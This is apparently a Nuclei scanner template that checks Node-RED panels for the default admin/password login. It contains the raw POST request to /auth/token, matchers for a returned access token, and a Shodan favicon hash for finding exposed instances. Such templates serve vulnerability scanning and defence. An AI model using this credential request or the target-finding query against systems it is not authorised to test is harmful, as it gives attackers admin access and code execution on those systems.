Vulnerability Description
Allows an attacker to log in to the Node-Red panel using the default credentials and execute RCE.
id: nodered-default-login
info:
  name: Node-Red - Default Login
  author: savik
  severity: critical
  description: |
    Allows attacker to log in and execute RCE on the Node-Red panel using the default credentials.
  reference:
    - https://quentinkaiser.be/pentesting/2018/09/07/node-red-rce/
  classification:
    cpe: cpe:2.3:a:nodered:node-red:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: nodered
    product: node-red
    shodan-query: http.favicon.hash:321591353
  tags: default-login,node-red,dashboard,vuln
http:
  - raw:
      - |
        POST /auth/token HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded;charset=UTF-8

        client_id=node-red-editor&grant_type=password&scope=&username={{username}}&password={{password}}
    attack: pitchfork
    payloads:
      username:
        - admin
      password:
        - password
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'access_token":'
          - 'expires_in":'
          - 'token_type":'
        condition: and
      - type: word
        part: header
        words:
          - 'application/json'
      - type: status
        status:
          - 200
# digest: 490a0046304402206db19d2d6fff4667787260b4c71eaf7fa2a0d34bb5931dc644750b7f2b8af9000220371554b4ae826c69fe41f47b232d8631910f7c746a66ab6ea7a46e5119c0e4f9:922c64590222798bb761d5b6d8e72950